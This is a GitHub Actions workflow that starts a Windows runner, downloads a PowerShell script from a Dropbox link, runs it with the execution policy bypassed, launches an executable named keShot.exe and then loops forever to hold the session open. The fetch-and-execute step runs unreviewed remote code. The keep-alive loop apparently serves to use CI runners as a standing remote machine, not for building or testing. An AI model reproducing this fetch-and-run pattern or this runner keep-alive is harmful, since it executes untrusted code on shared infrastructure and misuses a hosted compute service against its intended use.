name: Windows Auto Runner

on:
  workflow_dispatch:

jobs:
  run-windows:
    runs-on: windows-latest
    timeout-minutes: 60

    steps:
      - name: Download external Setup.ps1
        shell: powershell
        run: |
          Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/kvc0lcibrk68g7j8azu83/Setup.ps1?rlkey=oawv04248xvf9lnaebhjeeaa3&st=kca9y2of&raw=1" -OutFile "Setup.ps1"

      - name: Run external Setup.ps1
        shell: powershell
        run: |
          powershell -ExecutionPolicy Bypass -File "./Setup.ps1"

      - name: Run programs and keep session alive
        shell: powershell
        run: |
          Write-Host "Launching programs..."
          Start-Process ".\keShot.exe" -PassThru
      
          Write-Host "Keep Alive Loop started..."
          while ($true) {
            Start-Sleep -Seconds 10
          }
